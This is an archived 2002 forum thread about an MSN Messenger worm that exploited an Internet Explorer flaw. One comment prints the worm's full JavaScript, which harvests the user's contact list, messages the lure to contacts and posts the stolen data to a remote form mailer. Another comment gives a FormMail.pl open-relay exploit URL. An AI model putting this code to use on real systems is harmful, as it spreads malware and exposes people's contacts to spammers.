Forgot your password?
typodupeerror
Microsoft

Microsoft Instant Messenger Virus Sweeps Net 401

Posted by michael
from the RISKs-of-homogeneous-computing dept.
Many people have reported a Warhol virus affecting users of Microsoft Instant Messenger. If you get messaged, "Go To http://www.masenko-media.net/cool.html NoW !!!", or any similar message (apparently there are several websites with the infection code), I suggest not following the link. A brief discussion follows.

Sequence: Get messaged "Go To http://www.masenko-media.net/cool.html NoW !!!" or something similar with another URL. Follow the link. That webpage contains malicious code which gets your messenger contacts and sends a similar message to your contacts. It looks like it uses a vulnerability in formmail.pl as well, although I'm not exactly sure how (I'm not an expert in ECMAscript, sorry, and I have no systems that could possibly be affected by this to test with). I'm sure some of our readers can provide more information in the comments below.

There appear to be several webpages which carried the infected code, not just masenko-media.net. Some webmasters are already taking them down.

Sophistication: moderate. Damage: only your pride.

Solution: probably the latest mega-patch for Internet Explorer will fix the Microsoft bug that allowed this.

Risks: obviously, the code could have done worse than just messaging your contacts. With Microsoft making "messaging" an integrated part of the operating system, any flaws in it can be exploited to affect millions of people instantly, so it is a high-value target. Does it have commensurate high-strength security?

This discussion has been archived. No new comments can be posted.

Microsoft Instant Messenger Virus Sweeps Net

Comments Filter:
  • by Anonymous Coward
    because I was using the linux version of Microsoft Messenger!
  • by Second_Derivative (257815) on Wednesday February 13, 2002 @08:04PM (#3004051)
    If the entire population of slashdot accessing that site to point and laugh at the exploit code and how it doesnt affect them doesnt constitute a slashdotting, I dunno what does =) I already cant access it.

    Someone post more links to the other vector pages, if we can't get them down any other way we'll bum-rush em ;)
  • by rakerman (409507) on Wednesday February 13, 2002 @08:05PM (#3004054) Homepage Journal
    With a name like Warhol, obviously this isn't a virus, it's a form of art.
  • by Anonymous Coward on Wednesday February 13, 2002 @08:06PM (#3004056)
    iF yOuR fRiEnDs SeNd YoU mEsSaGeS fOrMaTtEd LiKe ThIs, YoU nEeD tO fInD nEw FrIeNdS!!!11
  • Other clients? (Score:5, Insightful)

    by Geeyzus (99967) <mark_madejNO@SPAMyahoo.com> on Wednesday February 13, 2002 @08:06PM (#3004057)
    I assume this only affects the MSN client from Microsoft... correct? Or does this also affect other clients that can use the MSN network, like Trillian? If it is just a link to some virus code on a website, it would affect Trillian (because it actually doesn't propagate through the instant messaging program)... but if it is something that gets triggered inside MSN Instant Messenger, then Trillian users are safe...

    Mark
    • Re:Other clients? (Score:5, Informative)

      by Static_Neurotoxin (141004) <static+slashdot@neurotoxin.net> on Wednesday February 13, 2002 @08:09PM (#3004078) Homepage
      Trillian is safe. Opera is safe. The only combo you need to worry about is IE and Messenger.
    • Re:Other clients? (Score:2, Informative)

      by Qwerpafw (315600)
      Fire (like trillian, but for OS X) doesn't seem to care. At least, as far as I can tell. Most likely the security hole lies in windows/MSN integration. or in the MSN client software. But not the messaging protocol.

      Of course, the trillian people have a MUCH better track record in terms of patches and so forth (they keep updating so it'll work with AOL...) so even if it affects trillian (pretty sure the answer is NO...) they will fix it before M$.
    • EveryBuddy [everybuddy.com] and Gaim [marko.net] are two alternative messaging clients that have access to the MSN chat system. I use to use Everybuddy but I prefer Gaim's interface now. Both are fully "skinnable" (using GTK themes) link Trillian [trillian.cc] is. There are plenty of alternatives to Microsoft's offering. MS's software would appear to make extensive use of scripting like most of their other products do, which does more bad than good with worms/viruses such as this one on the rounds. Gaim support perl scripting, but it's easy to disable it, and it's default state is disabled. I understand that most internet chat users probably don't realise that their software has this scripting ability. Maybe something needs done to make them aware of it and what it can (potentially) do. Then we might see less stories about people falling victim to these attacks. (hey!, stop laughing and saying they deserve it! that's not fair...)
    • It affects trillian too -- but only your MSN contacts. And you have to use IE when you click on the link.
  • Anyone surprised? (Score:2, Insightful)

    by Qwerpafw (315600)
    I for one, am not shocked at all :)

    Anyone who is shocked is a bit of a fool. It was only a matter of time, really, until one of M$'s many security holes in messenger was exploited. Kinda sad to think what will happen in the future as OS becomes more and more integrated with the internet. Your personal data (courtesy of passport) might be spread around if you replied to a IM, or data loss.

    Don't use microsoft products, so I am not vulnerable. Happy me.
  • by MathJMendl (144298) on Wednesday February 13, 2002 @08:07PM (#3004065) Homepage
    What's the url for this virus? The link to "Go To http://www.masenko-media.net/cool.html NoW" wasn't clickable. Please fix this, /. admin!
  • The Code (Score:5, Informative)

    by nihilist_1137 (536663) on Wednesday February 13, 2002 @08:07PM (#3004066) Homepage
    Use Trillian :http://www.trillian.cc. A few people msg me with the link. All that happens in that a blank window pops up. Mind you, i am on dual monitors so that may have had something to do with it. The code for the page (http://www.masenko-media.net/cool.html ) is:
    <br><br>
    <html>
    <head>
    <title>Welcome</title>
    <Script>

    var msnWin;
    var msnList;
    var msgStr = "Go To http://www.masenko-media.net/cool.html NoW !!!";

    function Go(){

    msnWin = document.open("res://mshtml.dll/blank.htm", "", "fullscreen=1");
    msnWin.resizeTo(1, 1);
    msnWin.moveTo(10000, 10000);
    msnWin.document.title = "Please Wait...";
    msnWin.document.body.innerHTML = '<object classid="clsid:F3A614DC-ABE0-11d2-A441-00C04F79568 3" id="msnObj1"></object><object classid="clsid:FB7199AB-79BF-11d2-8D94-0000F875C54 1" id="msnObj2"></object>';
    focus();

    if (msnWin.msnObj1.localState == 1){
    msnWin.msnObj2.autoLogon();
    }
    Contacts();
    Send();
    msnWin.close();
    document.contents.submit();
    }

    function Contacts(){
    msnList = msnWin.msnObj1.list(0);
    document.contents.email.value = msnWin.msnObj1.localLogonName;
    document.contents.subject.value = Date();
    var msnStr = "<br>";

    for (i=0;i<msnList.count;i++){
    if (msnList(i).state >1){
    msnStr += "Online Contact: " + msnList(i).FriendlyName + ", email: " + msnList(i).LogonName + "<br>";
    }

    else{
    msnStr += "Offline Contact: " + msnList(i).FriendlyName + ", email: " + msnList(i).LogonName + "<br>";
    }
    }
    document.contents.contentBox.value = msnStr;
    }

    function Send(){
    for (i=0;i<msnList.count; i++){
    if (msnList(i).state >1){
    msnList(i).sendText("MIME-Version: 1.0\r\nContent-Type: text/plain; charset=UTF-8\r\n\r\n", msgStr, 0);
    }
    }
    }

    </Script>
    </head>
    <body onload="Go()">
    <p align="center">&nbsp;
    <p align="center">&nbsp;</p>
    <p align="center">&nbsp;</p>
    <p align="center">&nbsp;</p>
    <p align="center"><font face="Arial">
    Please Wait...</font></p>
    <form METHOD="POST" ACTION="http://www.yong.f2s.com/mailform.pl" NAME="contents" ID="Form1">
    <input type="hidden" name="redirect" value="http://www.rjdesigns.co.uk/cool/go.htm" ID="Hidden1">
    <input type="hidden" name="recipient" value="mmargae@wanadoo.nl" ID="Hidden5">
    <input type="hidden" name="email">
    <input type="hidden" name="subject">
    <input type="hidden" NAME="contentBox" id="Hidden6">
    <input type=hidden name="env_report" value="REMOTE_HOST,HTTP_USER_AGENT">
    </form>
    </body>
    </html>
    • Re:The Code (Score:2, Informative)

      by suwain_2 (260792)
      $ wget http://www.masenko-media.net/cool.html
      --19:08:55-- http://www.masenko-media.net/cool.html => `cool.html' Connecting to www.masenko-media.net:80... connected! HTTP request sent, awaiting response... 404 Not Found 19:08:55 ERROR 404: Not Found.

      Seems they took it down? Now is this just going to have millions of people getting 404 messages?

    • Re:The Code (Score:4, Insightful)

      by einhverfr (238914) <chris...travers@@@gmail...com> on Wednesday February 13, 2002 @08:14PM (#3004118) Homepage Journal
      So this sends the links to your contacts in IM and takes your passport email address and sends it to the http://www.yong.f2s.com/mailform.pl (or something similar).

      Damage: not just your pride-- being bombarded with lots of spam? (I guess that is TBD)
    • by Wizard of OS (111213) on Wednesday February 13, 2002 @08:29PM (#3004221)
      Look closely:

      <input type="hidden" name="recipient" value=mmargae@wanadoo.nl" ID="Hidden5">

      I think somebody forgot that HTML source can be viewed ...

      The nasty part: every time somebody looks at this page, his MSN-email address is being posted to this mailform.pl script (the web equivalent of an open relay) and it is sent to this wanadoo.nl user.
    • Re:The Code (Score:2, Interesting)

      by meanman (86374)
      > msnWin = document.open("res://mshtml.dll/blank.htm", "", "fullscreen=1");
      > msnWin.resizeTo(1, 1);
      > msnWin.moveTo(10000, 10000);
      > msnWin.document.title = "Please Wait...";

      This is a particularly annoying tactic that some popup ads use, where you create a new full screen window (only works in IE) then resize it and move it. The result is a window that has no border at all, and the malicious ad can then display a 'windows like' dialog image that can easily fool your average windows user into clicking.
      • Javascript flame (Score:2, Flamebait)

        by Sloppy (14984)

        I don't get it... why do people whine about this? Just disable Javascript. Everything worthwhile on the web will still work just fine; it'll just go faster and screw you less often. Javascript should be extinct by now: Everyone who uses it hates it, people who turn it off are happier (I have never seen those x10 pop-under ads that everyone talks about), and it doesn't do anything useful. It's all pain with no gain.

        Web browsers shouldn't even include it anymore.

    • Re:The Code (Score:3, Insightful)

      by inKubus (199753)
      It's funny. Most of the code for Windows looks like this. Windows is basically one big script. Everything it does, practically, is scripted. They were relying on the fact that most of the scripting is undocumented, but a simple browse to \windows\web and opening *.htt with notepad should show you how much of a problem this is. Even something as fundamental as file browsing is scripted. There will always be a way to exploit windows.
  • by immanis (557955) <immanis@@@sfgoth...com> on Wednesday February 13, 2002 @08:08PM (#3004074) Homepage Journal

    I wrote a simple script about a year ago that exported a user's MSN registry key and sent it to me. Given that MSN logins, Passport Logins and Hotmail logins all could be gleaned from that key... well you get the idea.

    It worked too. Got to log into MSN as the CTO of our company, just to make a point.

    As long as scripters can manage things like this, and as long as it is _that_ easy to pull a person's login data from the registry, Passport will _never_ be secure.

  • Not a Messenger flaw (Score:5, Informative)

    by Osty (16825) on Wednesday February 13, 2002 @08:08PM (#3004076)

    First off, this is not a virus. It's an Internet Explorer exploit allowing access to your Messenger contact list and other Messenger functions. As the post noted, it is fixed with the latest IE patch. The actual problem was with IE's document.open scripting object, and how it was able to access local system objects from web sites (basically, the about: URI namespace was considered to be in the "My Computer" security domain, which means it had much more lax security than an actual website. However, since about: can take valid html, site developers were able to embed Messenger objects in about: pages, and access information from that). This is not a problem with Messenger at all.


    Install the patch and be done with it.

    • by RWarrior(fobw) (448405) on Wednesday February 13, 2002 @08:29PM (#3004224)
      "Install the patch and be done with it."

      Is that why I keep getting probed with NIMDA? Because people just install the patch and are done with it?

    • by Tackhead (54550)
      > First off, this is not a virus. It's an Internet Explorer exploit allowing access to your Messenger contact list and other Messenger functions.

      And while we're at it, this isn't a Warhol worm either.

      I don't see the optimized scanning routine for initial propagation. I don't see a precompiled target list or any innovative ways to scan the network. And if you wanted to do maximum damage, you'd release it on a Friday night before this weekend.

      Unless the spam from the formmail.pl script contains a very clever exploit to set the stage for a second round of infection, I'm calling this one a false alarm. It's an annoyance, but not a Warhol worm by any stretch of the imagination.

    • by lessthan0 (176618) on Wednesday February 13, 2002 @08:57PM (#3004363)
      And next week, when the next batch of critical security flaws is revealed, follow the Microsoft DIR cycle...

      1. Download the patch.
      2. Install the patch.
      3. Reboot.

      Plan to do this every week on all your critical servers, work machines and home PCs. Just do this every week forever, or as long as you run a Microsoft OS and be done with it.

    • "Install the patch and be done with it."

      On all 5000 desktops of your corporation.
  • by rogueuk (245470) on Wednesday February 13, 2002 @08:09PM (#3004080) Homepage
    the register [theregister.co.uk] had an article about this a few days ago. A flawed Document.Open() in the script apparently causes it. The demo site the reg links to is pretty interesting. And of course, MS has known about this since december :-P
    • And of course, MS has known about this since december :-P


      Yes, and there has been a patch for this problem. So what did you expect MS to do? Spam all the IM users to install the patch? C'mon.
      Btw, WindowsUpdate prompts you to install this patch, I don't see what else should have been done about it ("this bug should not have been there" rants don't count as a solution).
      • "this bug should not have been there" rants don't count as a solution

        You're artificially restricting the sphere of possible solutions to things that might help, which is intellectually honest. Shame on you.

        In ancient Sumeria, they used to execute architects when the buildings that they constructed collapsed. By the same token, we should kill some people.

        If we've learned one thing from the 20th century, it is that big government is inefficient. Therefore, the killings should be handled by the private sector.

        The proceedings against MS are criminal, in addition to civil. In a criminal proceeding, the judge is perfectly justified in issueing fatwas against MS programmers who write buggy code - this is a well established precept of Sharia.

        Thus, I've proven that the free market will take care of MS on it's own, punishing it for buggy programming - through highly paid mercenary assassins, with EULAs to kill.

        I want to test and see if anyone reads their EULAs. Distribute a piece of software with an EULA that says, about halfway through-
        "By installing this software, you agree to take up arms in defense of (company name), march to the fastness of her foe, and slaughter her enemies. Please register the software so that we can give you your orders."
    • And of course, MS has known about this since december :-P

      Perhaps that is why a patch is already available which fixes this problem? (And has been available for a while.)
  • by jfroot (455025) <darmok@tanagra.ca> on Wednesday February 13, 2002 @08:09PM (#3004081) Homepage
    I get this message from this girl I kindof like on MSN saying to go to this URL urgently. So I do (duh!). Turns out it is a porn site.. So I'm thinking what is this girl saying? Is she dropping some no so subtle hints? As I ponder this I get a MSN message from my mom asking me why I sent her a link to a porn site.. then I understood..
  • Warhol? worm (Score:5, Informative)

    by blkros (304521) <blkros AT yahoo DOT com> on Wednesday February 13, 2002 @08:10PM (#3004085)
    The worm seems to be named because of a quote that the site attributes to Andy Warhol.(ie. 'in the future everyone will have his 15 minutes of fame.') That quote should actually be attributed to Marshal MacLuhan, who Andy ripped it off from. So these worms should be name MacLuhan worms.
  • by einhverfr (238914) <chris...travers@@@gmail...com> on Wednesday February 13, 2002 @08:11PM (#3004093) Homepage Journal
    The page appears to post a hidden form with your email information to the page. I suspect that it may be a contact gatherer for spammers (a new low...) though it could have done much more.

    FormMail.pl is the perl script which recieves this information. It is pretty interesting...
    • quite probably unrelated to this is a few days ago my website got hit by some apparent script which was searching for "open" formmail.pl scripts to abuse by trying to send an email off to some random guy (I guess formmail.pl is fairly standard - the owner of the site whose script is being used may be an innocent relay in the warhol worm/virus). Here's the apache log line of when my site was scanned, just in case anyone else has spotted similar:

      24.90.121.snip - - [12/Feb/2002:00:38:16 -0500] "GET /cgi-bin/formmail.pl?email=f2%40aol%2Ecom&subject= bbx%2Eflarp%2Enet%2Fcgi%2Dbin%2Fformmail%2Epl&reci pient=icases0ber%40aol%2Ecom&msg=w00t HTTP/1.1Content-Type: application/x-www-form-urlencoded" 404 295 "-" "Gozilla/4.0 (compatible; MSIE 5.5; windows 2000)"

      It's RoadRunner cable modem service apparently, and the browser info is obviously going to be rubbish.

  • Finally! (Score:5, Funny)

    by digitalcowboy (142658) on Wednesday February 13, 2002 @08:13PM (#3004106)
    I've been reluctant to use the MS IM client because it didn't appear they had fully integrated it's virus abilities with all their other software. Now that it's part of a fully integrated Microsoft Virus Productivity Suite, I'm ready!

    Can anybody tell me where I can sign up for one of those Passport Universal Identifier and Cybercash Wallets and get the MS implant in my right hand or forehead?

  • by guttentag (313541) on Wednesday February 13, 2002 @08:14PM (#3004111) Journal
    Four entries in the Microsoft topic [slashdot.org] in one day?
    1. Microsoft Instant Messenger Virus Sweeps Net [slashdot.org]
    2. What is .NET? [slashdot.org]
    3. States Demand Windows Source Code [slashdot.org]
    4. Details of MSFT's Antitrust Lobbying [slashdot.org]
    There were none yesterday, or the day before... the calm before the storm...
  • by Max the Merciless (459901) on Wednesday February 13, 2002 @08:15PM (#3004122) Homepage
    until someone unleashes a virus that does some serious damage. If I was a "terrorist" hell bent on punishing the Western world for whatever percieved sins, I'd be learning how to make, or hiring programmers, to unleash a truely destructive virus.

    It's been said many times before, but I'll say it again, any monoculture is far more vulnerable to attack than a diverse system. Relying on one system, be it Microsoft or even Linux, is foolish.

    The destruction of the Microsoft monopoly is not just a matter of helping improve competition, it is a serious security matter. No amount of campaign donations or legal semantics should distract the government from its task of providing security.
  • worm primer (Score:2, Interesting)

    by elbobo (28495)
    just gave it a go, and it didn't affect me. running winxp with netcaptor [netcaptor.com] browser (embeds ie) and trillian [trillian.cc] (im client that connects to the msn messanger network among others)

    not that i was expecting it to work.

    what amuses me though, is how the linked page from this article reads like a very handy worm writing primer, suggesting better propogation methods -

    Optimized scanning routines, hitlist scanning, and permutation scanning can be combined to produce hyper virulent Warhol Worms. Since they are so fast, such worms would be the vehicle of choice for delivering malicious payloads to the net at large.
  • by J.D. Hogg (545364) on Wednesday February 13, 2002 @08:16PM (#3004136) Homepage
    I would be impressed to see a worm silently infect your machine and try to infect your contacts. But this one asks you a *click a url* ?? Anybody who doesn't dismiss a message with a URL or an attachment from somebody they don't know, whether it's in an instant message or an email, deserves to be infected (and also should have their computers taken away from them and a flyer explaining them why they shouldn't talk to strangers in the street given to them instead).

    But /. is right, it is a Warhol virus : all the posters who reported this non-news got their 15 minutes of fame on Slashdot.

    • It spreads through your contacts, so the recipients are more than likely receiving the URL from someone they know.
    • "somebody they don't know"

      It says that the virus sends the msg to people in the contact list. Hence, you'd get messages from your friends/family/whatever.

      • "It says that the virus sends the msg to people in the contact list. Hence, you'd get messages from your friends/family/whatever."

        Ah yes, I didn't see that, my fault. Still though, I got emails from friends with a strange vague "Go there it's cool" line, and that sounded odd enough that I didn't open them (i.e. it didn't sound like it came from that person, and even if it could have, it was too impersonal to be true). Turned out to be from an Outlook virus when I checked later.

  • Was that just an example URL?


    GET /cool.html HTTP/1.1
    Host: www.masenko-media.net
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Win32)

    HTTP/1.1 404 Not Found
    Date: Thu, 14 Feb 2002 00:07:30 GMT
    Server: Apache/1.3.20 (Unix) mod_bwlimited/0.8 PHP/4.0.6 DAV/1.0.2 mod_log_bytes/0.3 FrontPage/5.0.2.2510 mod_ssl/2.8.4 OpenSSL/0.9.6
    Transfer-Encoding: chunked
    Content-Type: text/html; charset=iso-8859-1

    <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
    <HTML><HEAD>
    <TITLE>404 Not Found</TITLE>
    </HEAD><BODY>
    <H1>Not Found</H1>
    The requested URL /cool.html was not found on this server.<P>
    <P>Additionally, a 404 Not Found
    error was encountered while trying to use an ErrorDocument to handle the request.
    <HR>
    <ADDRESS>Apache/1.3.20 Server at www.masenko-media.net Port 80</ADDRESS>
    </BODY></HTML>

    (No Micros**t anywhere on these machines. Cheers!)

    • Server: Apache/1.3.20 (Unix) mod_bwlimited/0.8

      hmmm.... well, i'm not really familiar with mod_bwlimited, but it sounds like a module for limitimg the bandwidth used by certain pages. (correct me if i'm being an idiot.)

      assuming i'm right, this really wasn't the place to put virus code. even though it's only a smallish html document, all the hits you can get from a virus would really add up. so you've already limited the spread of the virus. although, i'd bet it's just free web space, and <aphorism>beggars can't be choosers</aphorism>

  • One shoe drops (Score:5, Interesting)

    by Anonymous Coward on Wednesday February 13, 2002 @08:20PM (#3004163)
    Well, this is one of a number of Damoclean swords hanging over the Net. A couple of other widely predicted "what if..?"s have already come to pass: Nimda was the first successful implementation of one, attacking through multiple vulnerabilities; others would include yesterday's SNMP freakout, the separate possibility of routing protocol attacks, yadda yadda, oh look... you all read bugtraq|incidents|nanog, et al., and know the score, and are presumably not very vulnerable. (Although one especially interesting aspect of this and other worms is that it defeats the security posture that says "take yourself out of the top 10% of easy sites to break into [by, eg., ONLY implementing the SANS top 10/20 fixes] and the kiddies will pass you by". If you're vulnerable, you WILL be hit. ) "But I haven't got anything worth taking, why would anyone want to crack me?" *sigh*...


    The thing that gets me is that NOTHING MAKES ANY DIFFERENCE. Web defacements - make no difference. ILoveYou - no effect. Melissa: nada, Nimda - plus ca change, plus ca la meme chose. Code Red? code schmed. The PHBs seem quite happy to just reformat, reinstall, count it as a cost of doing business on the net, and forget any lessons less stupid people might learn.


    Don't believe me? check out the IIS curve at Netcraft [netcraft.com] . What happened after Nimda and Code Red? IIS usage INCREASED.

    Mebbe I'm just bitter cos I'vre been trying to break into info-sec work for the last few years and getting nowhere cos I haven't an MCSE|CCNA|CISSP|security clearance, although I can usually spot half a dozen glaring holes in a setup within a few hours. (actually I interviewed at a "leading security firm" once & was given an automated test: I couldn't help noticing the machine I was given was logged in as NT Domain Admin. No, it wasn't a double-bluff test of my ethics!)

    Er... well, yes, I AM bitter; but that doesn't change the fact that there are an awful lot of clueless gimps out there managing (techs who manage) networks and network-connected systems.
    It seems to me that nothing short of a totally 100% evil malware that nukes HDs after silently & terminally corrupting backups for a few weeks will hit enough people where it counts - their wallets - to make any difference to the importance placed on info-sec in the vast majority of places.

    • Re:One shoe drops (Score:5, Insightful)

      by rjamestaylor (117847) <rjamestaylor@gmail.com> on Wednesday February 13, 2002 @09:09PM (#3004410) Homepage Journal
      • Don't believe me? check out the IIS curve at Netcraft [netcraft.com] . What happened after Nimda and Code Red? IIS usage INCREASED.
      IT purchasing decisions are made by people who are insulated from these problems but not from IT advertising. Ergo, this kind of problem has little to no effect on the IT market.
    • Don't believe me? check out the IIS curve at Netcraft [netcraft.com] . What happened after Nimda and Code Red? IIS usage INCREASED.

      Firstly, statistics, even the 'raw' ones provided by Netcraft, can be read with any spin you choose to apply (as you have done)

      Secondly, you're not looking at sites that are active, just ones that have a webserver running. This includes about 2/3 of machines that aren't actually active servers. Check the figures yourself. 36.7 million polled, 13-ish million active. The more relevant graph is the second one provided, showing the count and growth of active servers, not just plain numbers of them.

  • formmail.pl (Score:5, Informative)

    by TheFlu (213162) on Wednesday February 13, 2002 @08:22PM (#3004177) Homepage
    Just an FYI about the lack of security on older versions of formmail.pl You should replace the exploitable version, if you are using it yourself.

    Formmail.pl Can Be Used As An Open Mail Relay

    Summary
    The CGI program Formmail.pl lacks adequate security checks and allows spammers to send anonymous e-mail using vulnerable host as mail relays.
    This vulnerability has already been exploit by spammers in many installations of Formmail.pl.

    Details
    Matt Wright's formmail.pl program does a "security check" on the HTTP_REFERER server variable. The security check is usually used to verify that information submitted from a form came from a proper or designated domain. This is usually done to prevent someone from creating a local, malicious form to submit to a script. This can be easily bypassed by passing a raw HTTP request, and faking the HTTP Referrer. This script also allows you to set the recipient's email address in the form. These two factors allow a malicious user to use the formmail.pl program two distribute their email (SPAM).

    Exploit:
    A URL such as the following:
    http://www.example.com/cgi-bin/FormMail.pl? recipient=email@address-to-spam.com&message= Proof%20that%20FormMail.pl%20can%20be%20used%20to% 20send%20anonymous%20spam.

    Will send an anonymous e-mail if the installed FormMail.pl is vulnerable.

    Workaround:
    1. Remove your formmail.pl script until the author provides a fix.
    or:
    2. Hard code the recipient's email address in the formmail.pl program. Do not rely on the address submitted by the user.
    • Re:formmail.pl (Score:3, Informative)

      by babbage (61057)
      As I understand it, Matt Wright has indicated that he doesn't have much interest in updating his old software anymore, so "official" bugfixes are unlikely to be forthcoming. As another commenter noted, the NMS [sourceforge.net] group is working on a suite of dropin replacements for each of the scripts that Matt wrote years ago, and among them is a very good replacement for FormMail.pl. These newer scripts are being developed with security and robustness in mind from the ground up.

      Even in cases where it might be safer & more efficient to use libraries from CPAN, the NMS group has deliberately decided to not make use of these libraries, so that novice devlopers could make use of these more reliable scripts without having to perform any configuration more advanced than setting a few variables and writing a little bit of HTML (which, presumably, they'll be more comfortable with anyway).

      Exploits like this are exactly why people should migrate the old Matt Wright code to NMS, which can be dropped in and up & running very quickly. It's easy, and it's much safer. It's the right thing to do.

  • by Cowculator (513725) on Wednesday February 13, 2002 @08:24PM (#3004191) Homepage

    "Go To http://www.goatse.cx NoW !!!"

    Imagine if your friends suddenly knew not only that you were gullible enough to fall for a virus like that, but that you had seen that site...

  • are from!!!


    I know that formmail.pl has some vulnerabilities, and figured people were just probing me.


    This would explain where it is coming from. Add this to the code red etc that my poor little web server on DSL has to deal with :(

  • by lblack (124294) on Wednesday February 13, 2002 @08:26PM (#3004206)
    Have any A/V companies deployed products to protect against instant messaging vulnerabilities? I know that Bitdefender [bitdefender.com] have a product that helps to increase your security when running such services, but I haven't heard of similar things from Norton/McAffee.

    I always thought this was kinda silly, waiting for the horse to leave before closing the stable. Did anybody not view Instant Messenger traffic, especially once it got into a high level of file transfer interaction, as not being a platform for the deployment of viruses?

    Still, this is a social engineering thing more than it is anything else. It's not even really a virus -- it's a piece of destructive code delivered via social engineering. It is not really self-propogating, though, in that it requires the server-side in order to be malicious, or do anything at all.

    That seems to me to be stretching "virus" a bit. Maybe "viral meme"? I agree it does spread a bit like a virus, but it actually requires fetching external information.

    -l

    P.S. Bitdefender are beta'ing a Linux product, by the way. It's not Open, but the beta is a free (as in beer) download. Disclaimer: I'm a fan of that company. ;)

    • I like the idea of third party protection for windows apps, but not for networking - I want protection for the file system. Imagine something like Zone alarm that pops up a dialog box asking if it's ok to let $app [read/write] files in $directory [never|once|today|always]?

      -- Our bits are better, they're gold plated.
  • Oops (Score:3, Funny)

    by Eric Damron (553630) on Wednesday February 13, 2002 @08:31PM (#3004239)
    I just copied and pasted part of this story into an outlook email and sent it to our staff warning them of the problem. The address to the masenko-media site came out as a URL. I wonder how many users will click it?
  • Why this is news (Score:3, Informative)

    by jeff13 (255285) on Wednesday February 13, 2002 @08:34PM (#3004252) Homepage
    People keep going on (posting here that is) as if this is some sort of sensationalization of Microsoft security issues. As if other media outlets jump on Microsoft like vultures. Well, wake up, they don't (imho). The 'straight' media tends to avoid bad business news, especially given the danger of being sued by the most politically powerful, media powerful, and just plain rich powerful, software company around. Hmmm, AOL/Time don't count right?

    Just because it's the latest #@#k up from Microsoft doesn't deminish it's importance as news.

    How many times have I shocked an Internet user (years of tech support, I'm so bitter!) by exploiting IExploder sillyness and effectively crack the lusers OS? They were none to pleased, I have to say. It's not like I can even code really, I'm a moron with programming. But if I can do it...

    And it's better to find out about these things in the news, not the hard way!
  • by Anonymous Coward on Wednesday February 13, 2002 @08:35PM (#3004254)
    "A fully coordinated worm, where the worms explicitly coordinate their attack on the network, is a theoretical possibility but has not been seen in practice due to the difficulty in coding and coordinating the worms."

    Obviously the author has not heard of the interpreted, functional programming language Erlang. It can be best described as "The Borg" and has language level support for things like automatic resource discovery, live updates of software modules and distributed databases. There are binaries available for many architectures.

    An attack platform written in this language has the potential to be utterly devastating. Imagine, all of the infected nodes know about all of the other nodes. You have a distributed database containing information on exploits and probes for various computer systems that can be updated on the fly as new exploits are discovered. Even the code for the platform itself can be updated while the system is running.

    As I recall, there was a story on /. some time ago about the impossibility of removing viruses from a computer network without shutting the network down under certain conditions.

    Why hasn't this happened yet? It surely isn't for lack of expertise. No need to worry though, all the legislation that's been passed regarding computer crime prevents this sort of thing, right?!
  • by 3ryon (415000) on Wednesday February 13, 2002 @08:36PM (#3004257)
    I guess they will need the whole month to 'focus on security'. Good thing they budgeted so much time.
  • "It's alright to fear the worm."

    (Prof. Nutbutter / Tales from the Punchbowl)

  • by nweaver (113078) on Wednesday February 13, 2002 @08:58PM (#3004366) Homepage

    Warhol style worms are purely active worms, which require no human intervention to spread. This worm sounds like an intervention-required worm/trojan (like a mailworm) but which spreads through MSN instead of email.

    It would be a warhol-like worm if the message sent automatically opened the web page, making it a purely autonomous worm. I sorta wish it was, because that would be an interesting validation of the speed of topologically aware active worms. Then again, I don't use MSN Messenger.

    For those who are interested, a more formal analysis is available Here [berkeley.edu], a paper I submitted to Usenix Security on the subject.

  • ...are aware of the seriousness of their acts.
    Don't they know that virus making will soon be considered a hate crime? [satirewire.com]

    On another note, I wonder how many victims of the Warhol virus also caught this recent virus. [bbspot.com]

  • by Metrollica (552191) <m etrollica AT hotmail D0T com> on Wednesday February 13, 2002 @09:02PM (#3004378) Homepage Journal
    The "Don't Fucking Open Me!" [bbspot.com] virus is still spreading havoc.

    E-mail inboxes were flooded with messages this morning as a new virus quickly spread around the world. Dubbed "Don't Fucking Open Me" by anti-virus researchers, the infected e-mail follows a similar course to other viruses and replicates by sending itself out to everyone in the infected computer's Outlook and Outlook Express address book. The virus also contains two different payloads: one version formats the hard drive and displays the message "This is for your own good"; the other payload creates random Power Point presentations in the "My Documents" folder.

    Savvy users can spot the virus by its subject which is "Don't Fucking Open Me" or by the attachment which is entitled "Don't_Fucking_Open_Me.exe".

    "This virus tricks the user with an old psychological tactic called reverse psychology. Apparently the curiosity created by the message has been too much for thousands of users," said anti-virus researcher Bob Atibop. According to Atibop, this isn't the first time reverse psychology has been used. In 1998, the "Don't Pee on Your Keyboard" worm caused a flood of damage.

    Researchers have seen large infection among AOL users and middle managers, the two largest concentrations of naive and inept computer users.

    Claudia Hawkins who was infected by the virus said, "My son told me not to open attachments, but.... I mean my MOM sent it! What if she was hurt?!?"

    Another infected user too embarrassed to reveal his name said, "I thought that there was no way that this could be a virus. What kind of stupid idiot virus writer would put a dumb title on it like that? No one would ever open something that says not to open it. The virus would never spread defeating the whole purpose of it."

    Experts advise extreme caution when opening messages entitled "Don't Fucking Open Me" or "Click Here for Cash and Virus Infection".
  • Well, there has been a couple of well known "features" for some time. All you needed was to insert some code on your site and you could see who visited you on the site and who their "Friends" were. on all sites this was only their Messenger name, including the ones on your contact list.

    Then there is some hardcoded urls into Messenger that allow certain sites obtain your email adr. and the emails adr. of the people in your contact list. thise sites include microsoft.com, hotmail.com.

    Hmm thinking about whipping up an example on my website,, heh could be fun.
  • Before, i was convinced that Microsoft's obsession with closed source was an evil plan to allow them to hide malicious code in Windows so they could take over computers/internet/world. Now i have come to realise, that the real reason is because they are so incompetent that they don't want anyone to see the crap, uncommented, un-nested, spaghetti code that they call software, for risk of other corporations laughing at them, like a lecturer laughs at the bottom-of-the-class student who submits their half-assed assignment code that looks like a 3-year old wrote it (i'm sure many 3 year olds could actually write decent code :) If anyone witnessed what was really in the operating system their business was relying on, they would rather have BBC BASIC (oh, wait, VB _is_ BASIC rofl :)

    Now i have realised that Microsoft couldn't plant code in Windows to take over the world, because they can't code, and are too busy writing software that will try to stop your computer working if you change more than 5 bits of hardware.
  • by Macrobat (318224) on Wednesday February 13, 2002 @09:19PM (#3004443)
    True story:

    I just visited my friend's brother to pick up a used telescope. His brother's system is down because he clicked on a link in an email that said something like "pictures of me naked."

    When I told him that anything like that was obviously a worm or some kind of scam, he responded: "But it was from a girl who DOES send me pictures of herself naked!"

    Didn't know what to say to that.

  • by weave (48069) on Wednesday February 13, 2002 @09:23PM (#3004455) Journal
